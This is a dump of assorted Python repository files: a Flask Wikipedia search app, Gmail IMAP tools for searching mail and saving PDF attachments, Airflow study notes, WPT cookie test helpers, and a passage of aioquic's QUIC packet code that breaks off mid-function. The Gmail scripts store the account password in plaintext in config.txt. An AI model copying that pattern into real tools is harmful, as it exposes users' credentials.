metadata (dict) | text (string, lengths 60 – 3.49M) |
---|---|
{
"source": "jimmytsang/WikipediaTech",
"score": 3
} |
#### File: jimmytsang/WikipediaTech/application.py
```python
from flask import request, url_for
from flask_api import FlaskAPI, status, exceptions
from flask_cors import CORS
from zimmerbot import *
application = FlaskAPI(__name__)
CORS(application)
@application.route("/", methods=["GET", "POST"])
def get_links():
    if request.method == "GET":
        list_of_links = main("dog", "en", "popularity", "10", "include")
    else:
        print(request.data)
        data = request.data
        if data["filter"] == "ores_quality" and data["language"] not in ["en", "ru", "fr"]:
            return ["ORES is not supported in this language"], status.HTTP_202_ACCEPTED
        list_of_links = main(data["query"], data["language"], data["filter"], data["limit"], data["stub"])
    if not list_of_links:
        return ["No search results found for this query"], status.HTTP_202_ACCEPTED
    return list_of_links

# Run the app.
if __name__ == "__main__":
    # Setting debug to True enables debug output. This line should be
    # removed before deploying a production app.
    # application.debug = True
    application.run()
```
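For reference, a minimal sketch of how a client might call this endpoint, assuming the app is served locally on Flask's default port and that the `requests` library is available; the host, port, and field values are illustrative only.

```python
# Hypothetical client call; host/port and payload values are assumptions.
import requests

payload = {
    "query": "dog",
    "language": "en",
    "filter": "popularity",   # or "most_linked_to" / "ores_quality"
    "limit": "10",
    "stub": "include",        # "exclude" drops stub articles
}
resp = requests.post("http://localhost:5000/", json=payload)
print(resp.status_code, resp.json())
```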
#### File: jimmytsang/WikipediaTech/linked_pages.py
```python
import pywikibot
import json, urllib
from language_dict import language_dict
# def generate_language_dict():
#     with open("list_of_wiki_languages.txt", "r") as file:
#         lines = file.read().split(",")
#     for i in range(len(lines)):
#         lines[i] = lines[i].strip()
#         lines[i] = lines[i].strip("\'")
#     dictionary = {lines[i+1]: lines[i] for i in range(0, len(lines), 2)}
#     return dictionary

### primary function
def count_backlinks(article_name, language_code):
    site = pywikibot.getSite(language_code)
    backlinks = getlinks(site, article_name)
    print(article_name)
    linked_to_count = 0
    for backlink in backlinks:
        linked_to_count += 1
    print(str(linked_to_count) + " articles link to " + article_name + "\n")
    return linked_to_count

### Returns the pages that link to the given article (its backlinks);
### redirect pages are filtered out.
def getlinks(site, pageName):
    page = pywikibot.Page(site, pageName)
    return site.pagebacklinks(page, followRedirects=False, filterRedirects=True)

if __name__ == "__main__":
    count_backlinks("Pear", language_dict["English"])
```
#### File: jimmytsang/WikipediaTech/zimmerbot.py
```python
from query_article_titles import *
from page_popularity import *
from linked_pages import *
from ores_assessment import *
import sys
# MAIN FUNCTION
def main(query, language_code, filter_method, limit, stub):
    # Process script arguments
    # For now, we only support limiting by number of articles, not total package size
    limit = min(int(limit), 500)
    # Get the query results (list of dictionaries)
    article_dictionaries = query_articles(query, language_code)[:limit+20]
    # List of article titles
    article_names = get_article_names_from_query(article_dictionaries)
    if filter_method == "ores_quality" or stub == "exclude":
        ores_rating_results = get_ores_assessment(article_names, language_code)
        # Assign a numerical score based on qualitative assessment
        scaled_ores_rating_results = scale_article_assessments(ores_rating_results)
    if stub == "exclude":
        scaled_ores_rating_results = {name: score for name, score in scaled_ores_rating_results.items() if score != 0}
        article_names = [name for name in article_names if name in scaled_ores_rating_results]
    # Dictionary of page objects with article names as keys
    articles = get_articles_from_names(article_names, language_code)  # {title: page_object}
    # Initialize empty dictionary of article ratings hashed by article name/title
    article_ratings = {}  # {title: numerical_article_score}
    if filter_method == "ores_quality":
        article_ratings = scaled_ores_rating_results
    elif filter_method == "popularity":
        for article in articles:
            article_ratings[article] = get_page_view(article, language_code)
    elif filter_method == "most_linked_to":
        for article in articles:
            article_ratings[article] = count_backlinks(article, language_code)
    else:
        print("Invalid filter method. Please choose popularity, most_linked_to, or ores_quality")
        sys.exit(0)
    sorted_articles = sorted(articles.items(), key=lambda x: article_ratings[x[0]], reverse=True)
    return process_results(sorted_articles[:limit])

def process_results(sorted_articles):
    results = []
    for i in range(len(sorted_articles)):
        results.append(sorted_articles[i][1].full_url())
    return results

if __name__ == "__main__":
    query = input("Please enter your query: ")
    language = language_dict[input("Please enter a language: ").capitalize()]
    filter_method = input("Please enter the filtering method: ")
    limit = input("Enter a limit no more than 500: ")
    stub = "include"
    main(query, language, filter_method, limit, stub)
``` |
{
"source": "JimmyVanHout/gmail_tools",
"score": 3
} |
#### File: JimmyVanHout/gmail_tools/gmail_extract_pdfs.py
```python
import datetime
import email
import gmail_search
import os
import re
import sys
IMAP_SERVER = "imap.gmail.com"
IMAP_PORT = "993"
VALID_OPTIONS = ["--use-config-file"]
CONFIG_FILE_NAME = "config.txt"
def get_dates_and_pdfs(messages):
dates_and_pdfs = []
for message in messages:
pdf = None
message_obj = email.message_from_string(message)
for part in message_obj.get_payload():
if part.get_content_type() == "application/octet-stream":
pdf = part.get_payload(decode=True)
break
date_pattern = re.compile(r"Date\: (?P<day_of_week>\w+), (?P<day>\d+) (?P<month>\w+) (?P<year>\d+) (?P<hours>\d+):(?P<minutes>\d+):(?P<seconds>\d+)")
date_match_groups = re.search(date_pattern, message).groupdict()
date = datetime.datetime.strptime(" ".join(list(date_match_groups.values())), "%a %d %b %Y %H %M %S")
dates_and_pdfs.append((date, pdf))
return dates_and_pdfs
def write_pdfs(dates_and_pdfs, beginning_of_name):
for date, pdf in dates_and_pdfs:
name = beginning_of_name + "-" + date.isoformat().replace(":", "-") + ".pdf"
with open(name, "wb") as file:
file.write(pdf)
def get_config_data_from_input():
email_address = input("Email address: ")
password = input("Password: ")
mailbox = input("Mailbox (default is \"inbox\"): ")
if mailbox == "":
mailbox = "inbox"
return email_address, password, mailbox
def write_data_to_config_file(email_address, password, mailbox):
    with open(CONFIG_FILE_NAME, "w") as file:
        file.write(email_address + " # email address\n")
        file.write(password + " # <PASSWORD>\n")
        file.write(mailbox + " # mailbox\n")
def read_data_from_config_file():
with open(CONFIG_FILE_NAME, "r") as file:
email_address = file.readline().split("#", 1)[0].rstrip()
password = file.readline().split("#", 1)[0].rstrip()
mailbox = file.readline().split("#", 1)[0].rstrip()
return email_address, password, mailbox
def print_correct_usage():
    print("Correct use:\n")
    print("python3 gmail_extract_pdfs.py <query_str> <beginning_of_name> [--use-config-file]")
def is_command_valid(command):
if len(command) < 3:
return False
if len(command) > 3:
for word in command[3:]:
if word not in VALID_OPTIONS:
return False
return True
def get_command_start_index(args):
for i in range(len(args)):
if os.path.basename(os.path.realpath(__file__)) in sys.argv[i]:
return i
if __name__ == "__main__":
os.chdir(os.path.dirname(os.path.realpath(__file__)))
command = sys.argv[get_command_start_index(sys.argv):]
if not is_command_valid(command):
print_correct_usage()
sys.exit(1)
search_str = command[1]
beginning_of_name = command[2]
use_config_file = True if "--use-config-file" in command else False
if use_config_file:
if CONFIG_FILE_NAME in os.listdir():
email_address, password, mailbox = read_data_from_config_file()
else:
email_address, password, mailbox = get_config_data_from_input()
write_data_to_config_file(email_address, password, mailbox)
else:
email_address, password, mailbox = get_config_data_from_input()
messages = gmail_search.search(email_address, password, search_str, mailbox)
dates_and_pdfs = get_dates_and_pdfs(messages)
if not os.path.isdir("pdfs"):
os.mkdir("pdfs")
os.chdir("pdfs")
write_pdfs(dates_and_pdfs, beginning_of_name)
os.chdir("..")
sys.exit(0)
```
#### File: JimmyVanHout/gmail_tools/gmail_search.py
```python
import imaplib
import os
import ssl
import sys
VALID_OPTIONS = ["--use-config-file", "--save-messages"]
CONFIG_FILE_NAME = "config.txt"
IMAP_SERVER = "imap.gmail.com"
PORT = "993"
def search(email_address, password, search_str, mailbox="inbox"):
imap4ssl = setup(email_address, password, mailbox)
message_ids = get_message_ids(imap4ssl, search_str)
messages = get_messages(imap4ssl, message_ids)
messages = clean(messages)
finish(imap4ssl)
return messages
def setup(email_address, password, mailbox):
ssl_context = ssl.create_default_context()
imap4ssl = imaplib.IMAP4_SSL(host=IMAP_SERVER, port=PORT, ssl_context=ssl_context)
imap4ssl.login(email_address, password)
imap4ssl.select(mailbox)
return imap4ssl
def get_message_ids(imap4ssl, search_str):
message_ids = imap4ssl.search(None, search_str)[1][0].split()
print("Found " + str(len(message_ids)) + " messages")
return message_ids
def get_messages(imap4ssl, message_ids):
messages = []
print("Fetching messages")
count = 1
for message_id in message_ids:
message = imap4ssl.fetch(message_id, "(RFC822)")[1][0][1].decode("utf-8")
messages.append(message)
print("Progress: {percentage:.2f}%".format(percentage=(count / len(message_ids) * 100)))
count += 1
print("Finished fetching messages")
return messages
def clean(messages):
cleaned_messages = []
for message in messages:
cleaned_message = message.replace("=\r\n", "")
cleaned_messages.append(cleaned_message)
return cleaned_messages
def finish(imap4ssl):
imap4ssl.close()
imap4ssl.logout()
def print_correct_usage():
    print("Correct use:\n")
    print("python3 gmail_search.py <query_str> [--use-config-file] [--save-messages]")
def get_config_data_from_input():
email_address = input("Email address: ")
password = input("Password: ")
mailbox = input("Mailbox (default is \"inbox\"): ")
if mailbox == "":
mailbox = "inbox"
return email_address, password, mailbox
def write_data_to_config_file(email_address, password, mailbox):
    with open(CONFIG_FILE_NAME, "w") as file:
        file.write(email_address + " # email address\n")
        file.write(password + " # <PASSWORD>\n")
        file.write(mailbox + " # mailbox\n")
def read_data_from_config_file():
with open(CONFIG_FILE_NAME, "r") as file:
email_address = file.readline().split("#", 1)[0].rstrip()
password = file.readline().split("#", 1)[0].rstrip()
mailbox = file.readline().split("#", 1)[0].rstrip()
return email_address, password, mailbox
def write_messages_to_files(messages):
for i in range(len(messages)):
with open("message_" + str(i + 1) + ".txt", "w") as file:
file.write(messages[i])
def print_messages(messages):
for message in messages:
print(message)
def is_command_valid(command):
if len(command) == 1:
return False
if len(command) > 2:
for word in command[2:]:
if word not in VALID_OPTIONS:
return False
return True
def get_command_start_index(args):
for i in range(len(args)):
if os.path.basename(os.path.realpath(__file__)) in sys.argv[i]:
return i
if __name__ == "__main__":
os.chdir(os.path.dirname(os.path.realpath(__file__)))
command = sys.argv[get_command_start_index(sys.argv):]
if not is_command_valid(command):
print_correct_usage()
sys.exit(1)
search_str = command[1]
use_config_file = True if "--use-config-file" in command else False
save_messages = True if "--save-messages" in command else False
email_address = password = mailbox = None
if use_config_file:
if CONFIG_FILE_NAME in os.listdir():
email_address, password, mailbox = read_data_from_config_file()
else:
email_address, password, mailbox = get_config_data_from_input()
write_data_to_config_file(email_address, password, mailbox)
else:
email_address, password, mailbox = get_config_data_from_input()
messages = search(email_address, password, search_str, mailbox)
if save_messages:
if not os.path.isdir("messages"):
os.mkdir("messages")
os.chdir("messages")
write_messages_to_files(messages)
os.chdir("..")
else:
print_messages(messages)
sys.exit(0)
``` |
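Since `gmail_search.search()` is what `gmail_extract_pdfs.py` imports, it can also be used directly as a library. A minimal sketch, assuming IMAP access is enabled for the account; the credentials and IMAP search criteria below are placeholders (Gmail typically requires an app password).

```python
# Placeholder credentials and criteria; not a working account.
import gmail_search

messages = gmail_search.search(
    "user@example.com",
    "app-password",
    '(SUBJECT "invoice")',   # IMAP search criteria string
    mailbox="inbox",
)
print("Fetched {} matching messages".format(len(messages)))
```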
{
"source": "jimmyvluong/apacheairflow",
"score": 3
} |
#### File: jimmyvluong/apacheairflow/airflow_examples.py
```python
etl_dag = DAG(
    dag_id = 'etl_pipeline',
    default_args = {"start_date": "2020-01-08"})
# Note that within any Python code, etl_dag is the variable identifier, but within the Airflow shell command, you must use the dag_id.
# Running a simple Airflow task
# airflow run <dag_id> <task_id> <start_date>
airflow run example-etl download-file 2020-01-10
# DAGs on the command line
# list all DAGs
airflow list_dags
# help
airflow -h
### EXAMPLE 1 ###
# Import the DAG object
from airflow.models import DAG
# Define the default_args dictionary
default_args = {
'owner': 'dsmith',
'start_date': datetime(2020, 1, 14),
'retries': 2
}
# Instantiate the DAG object
etl_dag = DAG('example_etl', default_args=default_args)
### EXAMPLE 2 ###
from airflow.models import DAG
default_args = {
'owner': 'jdoe',
'start_date': '2019-01-01'
}
dag = DAG( dag_id="etl_update", default_args=default_args )
### EXAMPLE 3 ###
from airflow.models import DAG
default_args = {
'owner': 'jdoe',
'email': '<EMAIL>'
}
dag = DAG( 'refresh_data', default_args=default_args )
### WEB INTERFACE ###
airflow webserver -h
# Start an airflow webserver on port 9090
airflow webserver -p 9090
### OPERATORS ###
## TROUBLESHOOTING ##
# The dummy operator is used for troubleshooting or for a task that has NOT yet been implemented
DummyOperator(task_id = 'example', dag = dag)
## BASH OPERATOR ##
# Import the BashOperator
from airflow.operators.bash_operator import BashOperator
# Executes a given bash command or script
## EXAMPLE 1 ##
# Runs a bash command to echo "Example!" to standard output
BashOperator(
task_id = 'bash_example',
bash_command = 'echo "Example!"',
dag = ml_dag)
## Example 2 ##
# Runs a predefined bash script for its command, runcleanup
BashOperator(
task_id = 'bash_script_example',
bash_command = 'run_cleanup.sh',
dag = ml_dag)
## Example 3 ##
# Define a task with a task_id, run the bash_command 'echo 1', and assign the operator to a DAG.
# Note that the DAG (dag) was defined above in Example 2.
example_task = BashOperator(
task_id = 'bash_ex',
bash_command = 'echo 1',
dag = dag)
## Example 4 ##
# Run a quick data cleaning operation using cat and awk.
bash_task = BashOperator(
task_id = 'clean_addresses',
bash_command = 'cat addresses.txt | awk "NF == 10" > cleaned.txt',
dag = dag)
## Example 5 ##
# A collection of 3 BashOperators in an Airflow workflow, with dependencies set via the bitshift operator.
# This adds reliability and repeatability to common tasks run from the shell.
# Import the BashOperator
from airflow.operators.bash_operator import BashOperator
# Define the first BashOperator
task1_cleanup = BashOperator(
task_id='first_cleanup_task',
# Define the bash_command
bash_command='cleanup.sh',
# Add the task to the dag
dag= analytics_dag)
# Define a second operator to run the `consolidate_data.sh` script
task2_consolidate = BashOperator(
task_id='second_consolidate_task',
bash_command= 'consolidate_data.sh',
dag = analytics_dag)
# Define a final operator to execute the `push_data.sh` script
task3_push_data = BashOperator(
task_id='third_pushdata_task',
bash_command='push_data.sh',
dag = analytics_dag)
## DEPENDENCIES ##
# task 1 must run before task 2
# task 3 must run before task 2
# task 1 and task 3 don't depend on each other and can run in any order
task1_cleanup >> task2_consolidate
task3_push_data >> task2_consolidate
# Example of chained tasks
# task_1 >> task_2 >> task_3
## CO-DEPENDENCY ERROR ##
# List the DAGs.
# Decipher the error message.
# Use cat workspace/dags/codependent.py to view the Python code.
ERROR - Failed to bag_dag: /home/repl/workspace/dags/codependent.py
cat workspace/dags/codependent.py
----------------------------------
repl:~$ cat workspace/dags/codependent.py
from airflow.models import DAG
from airflow.operators.bash_operator import BashOperator
from datetime import datetime
default_args = {
'owner': 'dsmith',
'start_date': datetime(2020, 2, 12),
'retries': 1
}
codependency_dag = DAG('codependency', default_args=default_args)
task1 = BashOperator(task_id='first_task',
bash_command='echo 1',
dag=codependency_dag)
task2 = BashOperator(task_id='second_task',
bash_command='echo 2',
dag=codependency_dag)
task3 = BashOperator(task_id='third_task',
bash_command='echo 3',
dag=codependency_dag)
# task1 must run before task2 which must run before task3
task1 >> task2
task2 >> task3
task3 >> task1 # THIS LINE NEEDS TO BE DELETED.
# Using the Airflow UI to determine any issues with your DAGs is a great troubleshooting step.
# For this particular issue, a loop, or cycle, is present within the DAG.
# Note that technically removing the first dependency would resolve the issue as well, but the comments specifically reference the desired effect.
# Commenting the desired effect in this way can often help resolve bugs in Airflow DAG execution.
### PythonOperator ###
## Example 1 ##
# A simple printme function that writes a message to the task logs.
# Import the PythonOperator
from airflow.operators.python_operator import PythonOperator
# Create the function printme()
def printme():
print("This goes in the logs!")
# Create the PythonOperator instance called python_task and add the necessary arguments
python_task = PythonOperator(
task_id = 'simple_print',
python_callable = printme,
dag = example_dag)
``` |
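Pulling the pieces from these notes together, here is a minimal, self-contained DAG file in the same Airflow 1.x style; the DAG name, commands, and owner are illustrative only.

```python
# One BashOperator feeding one PythonOperator, with a bitshift dependency.
from datetime import datetime

from airflow.models import DAG
from airflow.operators.bash_operator import BashOperator
from airflow.operators.python_operator import PythonOperator

default_args = {
    'owner': 'jdoe',
    'start_date': datetime(2020, 1, 14),
    'retries': 1,
}

example_dag = DAG('notes_example', default_args=default_args)

cleanup_task = BashOperator(
    task_id='cleanup',
    bash_command='echo "cleaning up"',
    dag=example_dag)

def report():
    print("cleanup finished")

report_task = PythonOperator(
    task_id='report',
    python_callable=report,
    dag=example_dag)

# cleanup must run before report
cleanup_task >> report_task
```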
{
"source": "jimmywarting/wpt",
"score": 3
} |
#### File: cookies/resources/cookie.py
```python
import json
from cookies.resources.helpers import setNoCacheAndCORSHeaders
from wptserve.utils import isomorphic_decode
from wptserve.utils import isomorphic_encode
def set_cookie(headers, cookie_string, drop=False):
"""Helper method to add a Set-Cookie header"""
if drop:
cookie_string = cookie_string.encode('utf-8') + b'; max-age=0'
headers.append((b'Set-Cookie', isomorphic_encode(cookie_string)))
def main(request, response):
"""Set or drop a cookie via GET params.
Usage: `/cookie.py?set={cookie}` or `/cookie.py?drop={cookie}`
The passed-in cookie string should be stringified via JSON.stringify() (in
the case of multiple cookie headers sent in an array) and encoded via
encodeURIComponent, otherwise `parse_qsl` will split on any semicolons
(used by the Request.GET property getter). Note that values returned by
Request.GET will decode any percent-encoded sequences sent in a GET param
(which may or may not be surprising depending on what you're doing).
Note: here we don't use Response.delete_cookie() or similar other methods
in this resources directory because there are edge cases that are impossible
to express via those APIs, namely a bare (`Path`) or empty Path (`Path=`)
attribute. Instead, we pipe through the entire cookie and append `max-age=0`
to it.
"""
headers = setNoCacheAndCORSHeaders(request, response)
try:
if b'drop' in request.GET:
cookie = request.GET[b'drop']
cookie = json.loads(cookie)
cookies = cookie if isinstance(cookie, list) else [cookie]
for c in cookies:
set_cookie(headers, c, drop=True)
if b'set' in request.GET:
cookie = isomorphic_decode(request.GET[b'set'])
cookie = json.loads(cookie)
cookies = cookie if isinstance(cookie, list) else [cookie]
for c in cookies:
set_cookie(headers, c)
if b'location' in request.GET:
headers.append((b'Location', request.GET[b'location']))
return 302, headers, b'{"redirect": true}'
return headers, b'{"success": true}'
except Exception as e:
return 500, headers, json.dumps({'error': '{}'.format(e)}).encode('utf-8')
```
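To illustrate the encoding convention described in the docstring, here is a small sketch of how a caller might build `set`/`drop` URLs for this resource. WPT tests do this in JavaScript with `JSON.stringify` plus `encodeURIComponent`; the Python equivalent below uses a placeholder path prefix.

```python
# Build percent-encoded, JSON-stringified cookie parameters for cookie.py.
import json
from urllib.parse import quote

cookies = ['a=b; Path=/; Secure', 'c=d; Max-Age=60']
set_url = "/cookies/resources/cookie.py?set=" + quote(json.dumps(cookies))
drop_url = "/cookies/resources/cookie.py?drop=" + quote(json.dumps(cookies))
print(set_url)
print(drop_url)
```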
#### File: embedded-content/the-img-element/404-response-with-actual-image-data.py
```python
import base64
def main(req, res):
    return 404, [(b'Content-Type', b'image/png')], base64.decodebytes(b"<KEY>=")
```
#### File: aioquic/quic/packet.py
```python
import binascii
import ipaddress
import os
from dataclasses import dataclass
from enum import IntEnum
from typing import List, Optional, Tuple
from cryptography.hazmat.primitives.ciphers.aead import AESGCM
from ..buffer import Buffer
from ..tls import pull_block, push_block
from .rangeset import RangeSet
PACKET_LONG_HEADER = 0x80
PACKET_FIXED_BIT = 0x40
PACKET_SPIN_BIT = 0x20
PACKET_TYPE_INITIAL = PACKET_LONG_HEADER | PACKET_FIXED_BIT | 0x00
PACKET_TYPE_ZERO_RTT = PACKET_LONG_HEADER | PACKET_FIXED_BIT | 0x10
PACKET_TYPE_HANDSHAKE = PACKET_LONG_HEADER | PACKET_FIXED_BIT | 0x20
PACKET_TYPE_RETRY = PACKET_LONG_HEADER | PACKET_FIXED_BIT | 0x30
PACKET_TYPE_ONE_RTT = PACKET_FIXED_BIT
PACKET_TYPE_MASK = 0xF0
CONNECTION_ID_MAX_SIZE = 20
PACKET_NUMBER_MAX_SIZE = 4
RETRY_AEAD_KEY = binascii.unhexlify("4d32ecdb2a2133c841e4043df27d4430")
RETRY_AEAD_NONCE = binascii.unhexlify("4d1611d05513a552c587d575")
RETRY_INTEGRITY_TAG_SIZE = 16
class QuicErrorCode(IntEnum):
NO_ERROR = 0x0
INTERNAL_ERROR = 0x1
SERVER_BUSY = 0x2
FLOW_CONTROL_ERROR = 0x3
STREAM_LIMIT_ERROR = 0x4
STREAM_STATE_ERROR = 0x5
FINAL_SIZE_ERROR = 0x6
FRAME_ENCODING_ERROR = 0x7
TRANSPORT_PARAMETER_ERROR = 0x8
CONNECTION_ID_LIMIT_ERROR = 0x9
PROTOCOL_VIOLATION = 0xA
INVALID_TOKEN = 0xB
CRYPTO_BUFFER_EXCEEDED = 0xD
CRYPTO_ERROR = 0x100
class QuicProtocolVersion(IntEnum):
NEGOTIATION = 0
DRAFT_25 = 0xFF000019
DRAFT_26 = 0xFF00001A
DRAFT_27 = 0xFF00001B
@dataclass
class QuicHeader:
is_long_header: bool
version: Optional[int]
packet_type: int
destination_cid: bytes
source_cid: bytes
token: bytes = b""
integrity_tag: bytes = b""
rest_length: int = 0
def decode_packet_number(truncated: int, num_bits: int, expected: int) -> int:
"""
Recover a packet number from a truncated packet number.
See: Appendix A - Sample Packet Number Decoding Algorithm
"""
window = 1 << num_bits
half_window = window // 2
candidate = (expected & ~(window - 1)) | truncated
if candidate <= expected - half_window and candidate < (1 << 62) - window:
return candidate + window
elif candidate > expected + half_window and candidate >= window:
return candidate - window
else:
return candidate
def get_retry_integrity_tag(
packet_without_tag: bytes, original_destination_cid: bytes
) -> bytes:
"""
Calculate the integrity tag for a RETRY packet.
"""
# build Retry pseudo packet
buf = Buffer(capacity=1 + len(original_destination_cid) + len(packet_without_tag))
buf.push_uint8(len(original_destination_cid))
buf.push_bytes(original_destination_cid)
buf.push_bytes(packet_without_tag)
assert buf.eof()
# run AES-128-GCM
aead = AESGCM(RETRY_AEAD_KEY)
integrity_tag = aead.encrypt(RETRY_AEAD_NONCE, b"", buf.data)
assert len(integrity_tag) == RETRY_INTEGRITY_TAG_SIZE
return integrity_tag
def get_spin_bit(first_byte: int) -> bool:
return bool(first_byte & PACKET_SPIN_BIT)
def is_long_header(first_byte: int) -> bool:
return bool(first_byte & PACKET_LONG_HEADER)
def pull_quic_header(buf: Buffer, host_cid_length: Optional[int] = None) -> QuicHeader:
first_byte = buf.pull_uint8()
integrity_tag = b""
token = b""
if is_long_header(first_byte):
# long header packet
version = buf.pull_uint32()
destination_cid_length = buf.pull_uint8()
if destination_cid_length > CONNECTION_ID_MAX_SIZE:
raise ValueError(
"Destination CID is too long (%d bytes)" % destination_cid_length
)
destination_cid = buf.pull_bytes(destination_cid_length)
source_cid_length = buf.pull_uint8()
if source_cid_length > CONNECTION_ID_MAX_SIZE:
raise ValueError("Source CID is too long (%d bytes)" % source_cid_length)
source_cid = buf.pull_bytes(source_cid_length)
if version == QuicProtocolVersion.NEGOTIATION:
# version negotiation
packet_type = None
rest_length = buf.capacity - buf.tell()
else:
if not (first_byte & PACKET_FIXED_BIT):
raise ValueError("Packet fixed bit is zero")
packet_type = first_byte & PACKET_TYPE_MASK
if packet_type == PACKET_TYPE_INITIAL:
token_length = buf.pull_uint_var()
token = buf.pull_bytes(token_length)
rest_length = buf.pull_uint_var()
elif packet_type == PACKET_TYPE_RETRY:
token_length = buf.capacity - buf.tell() - RETRY_INTEGRITY_TAG_SIZE
token = buf.pull_bytes(token_length)
integrity_tag = buf.pull_bytes(RETRY_INTEGRITY_TAG_SIZE)
rest_length = 0
else:
rest_length = buf.pull_uint_var()
return QuicHeader(
is_long_header=True,
version=version,
packet_type=packet_type,
destination_cid=destination_cid,
source_cid=source_cid,
token=token,
integrity_tag=integrity_tag,
rest_length=rest_length,
)
else:
# short header packet
if not (first_byte & PACKET_FIXED_BIT):
raise ValueError("Packet fixed bit is zero")
packet_type = first_byte & PACKET_TYPE_MASK
destination_cid = buf.pull_bytes(host_cid_length)
return QuicHeader(
is_long_header=False,
version=None,
packet_type=packet_type,
destination_cid=destination_cid,
source_cid=b"",
token=b"",
rest_length=buf.capacity - buf.tell(),
)
def encode_quic_retry(
version: int,
source_cid: bytes,
destination_cid: bytes,
original_destination_cid: bytes,
retry_token: bytes,
) -> bytes:
buf = Buffer(
capacity=7
+ len(destination_cid)
+ len(source_cid)
+ len(retry_token)
+ RETRY_INTEGRITY_TAG_SIZE
)
buf.push_uint8(PACKET_TYPE_RETRY)
buf.push_uint32(version)
buf.push_uint8(len(destination_cid))
buf.push_bytes(destination_cid)
buf.push_uint8(len(source_cid))
buf.push_bytes(source_cid)
buf.push_bytes(retry_token)
buf.push_bytes(get_retry_integrity_tag(buf.data, original_destination_cid))
assert buf.eof()
return buf.data
def encode_quic_version_negotiation(
source_cid: bytes, destination_cid: bytes, supported_versions: List[int]
) -> bytes:
buf = Buffer(
capacity=7
+ len(destination_cid)
+ len(source_cid)
+ 4 * len(supported_versions)
)
buf.push_uint8(os.urandom(1)[0] | PACKET_LONG_HEADER)
buf.push_uint32(QuicProtocolVersion.NEGOTIATION)
buf.push_uint8(len(destination_cid))
buf.push_bytes(destination_cid)
buf.push_uint8(len(source_cid))
buf.push_bytes(source_cid)
for version in supported_versions:
buf.push_uint32(version)
return buf.data
# TLS EXTENSION
@dataclass
class QuicPreferredAddress:
ipv4_address: Optional[Tuple[str, int]]
ipv6_address: Optional[Tuple[str, int]]
connection_id: bytes
stateless_reset_token: bytes
@dataclass
class QuicTransportParameters:
original_connection_id: Optional[bytes] = None
idle_timeout: Optional[int] = None
stateless_reset_token: Optional[bytes] = None
max_packet_size: Optional[int] = None
initial_max_data: Optional[int] = None
initial_max_stream_data_bidi_local: Optional[int] = None
initial_max_stream_data_bidi_remote: Optional[int] = None
initial_max_stream_data_uni: Optional[int] = None
initial_max_streams_bidi: Optional[int] = None
initial_max_streams_uni: Optional[int] = None
ack_delay_exponent: Optional[int] = None
max_ack_delay: Optional[int] = None
disable_active_migration: Optional[bool] = False
preferred_address: Optional[QuicPreferredAddress] = None
active_connection_id_limit: Optional[int] = None
max_datagram_frame_size: Optional[int] = None
quantum_readiness: Optional[bytes] = None
PARAMS = {
0: ("original_connection_id", bytes),
1: ("idle_timeout", int),
2: ("stateless_reset_token", bytes),
3: ("max_packet_size", int),
4: ("initial_max_data", int),
5: ("initial_max_stream_data_bidi_local", int),
6: ("initial_max_stream_data_bidi_remote", int),
7: ("initial_max_stream_data_uni", int),
8: ("initial_max_streams_bidi", int),
9: ("initial_max_streams_uni", int),
10: ("ack_delay_exponent", int),
11: ("max_ack_delay", int),
12: ("disable_active_migration", bool),
13: ("preferred_address", QuicPreferredAddress),
14: ("active_connection_id_limit", int),
32: ("max_datagram_frame_size", int),
3127: ("quantum_readiness", bytes),
}
def pull_quic_preferred_address(buf: Buffer) -> QuicPreferredAddress:
ipv4_address = None
ipv4_host = buf.pull_bytes(4)
ipv4_port = buf.pull_uint16()
if ipv4_host != bytes(4):
ipv4_address = (str(ipaddress.IPv4Address(ipv4_host)), ipv4_port)
ipv6_address = None
ipv6_host = buf.pull_bytes(16)
ipv6_port = buf.pull_uint16()
if ipv6_host != bytes(16):
ipv6_address = (str(ipaddress.IPv6Address(ipv6_host)), ipv6_port)
connection_id_length = buf.pull_uint8()
connection_id = buf.pull_bytes(connection_id_length)
stateless_reset_token = buf.pull_bytes(16)
return QuicPreferredAddress(
ipv4_address=ipv4_address,
ipv6_address=ipv6_address,
connection_id=connection_id,
stateless_reset_token=stateless_reset_token,
)
def push_quic_preferred_address(
buf: Buffer, preferred_address: QuicPreferredAddress
) -> None:
if preferred_address.ipv4_address is not None:
buf.push_bytes(ipaddress.IPv4Address(preferred_address.ipv4_address[0]).packed)
buf.push_uint16(preferred_address.ipv4_address[1])
else:
buf.push_bytes(bytes(6))
if preferred_address.ipv6_address is not None:
buf.push_bytes(ipaddress.IPv6Address(preferred_address.ipv6_address[0]).packed)
buf.push_uint16(preferred_address.ipv6_address[1])
else:
buf.push_bytes(bytes(18))
buf.push_uint8(len(preferred_address.connection_id))
buf.push_bytes(preferred_address.connection_id)
buf.push_bytes(preferred_address.stateless_reset_token)
def pull_quic_transport_parameters(
buf: Buffer, protocol_version: int
) -> QuicTransportParameters:
params = QuicTransportParameters()
if protocol_version < QuicProtocolVersion.DRAFT_27:
with pull_block(buf, 2) as length:
end = buf.tell() + length
while buf.tell() < end:
param_id = buf.pull_uint16()
param_len = buf.pull_uint16()
param_start = buf.tell()
if param_id in PARAMS:
# parse known parameter
param_name, param_type = PARAMS[param_id]
if param_type == int:
setattr(params, param_name, buf.pull_uint_var())
elif param_type == bytes:
setattr(params, param_name, buf.pull_bytes(param_len))
elif param_type == QuicPreferredAddress:
setattr(params, param_name, pull_quic_preferred_address(buf))
else:
setattr(params, param_name, True)
else:
# skip unknown parameter
buf.pull_bytes(param_len)
assert buf.tell() == param_start + param_len
else:
while not buf.eof():
param_id = buf.pull_uint_var()
param_len = buf.pull_uint_var()
param_start = buf.tell()
if param_id in PARAMS:
# parse known parameter
param_name, param_type = PARAMS[param_id]
if param_type == int:
setattr(params, param_name, buf.pull_uint_var())
elif param_type == bytes:
setattr(params, param_name, buf.pull_bytes(param_len))
elif param_type == QuicPreferredAddress:
setattr(params, param_name, pull_quic_preferred_address(buf))
else:
setattr(params, param_name, True)
else:
# skip unknown parameter
buf.pull_bytes(param_len)
assert buf.tell() == param_start + param_len
return params
def push_quic_transport_parameters(
buf: Buffer, params: QuicTransportParameters, protocol_version: int
) -> None:
if protocol_version < QuicProtocolVersion.DRAFT_27:
with push_block(buf, 2):
for param_id, (param_name, param_type) in PARAMS.items():
param_value = getattr(params, param_name)
if param_value is not None and param_value is not False:
buf.push_uint16(param_id)
with push_block(buf, 2):
if param_type == int:
buf.push_uint_var(param_value)
elif param_type == bytes:
buf.push_bytes(param_value)
elif param_type == QuicPreferredAddress:
push_quic_preferred_address(buf, param_value)
else:
for param_id, (param_name, param_type) in PARAMS.items():
param_value = getattr(params, param_name)
if param_value is not None and param_value is not False:
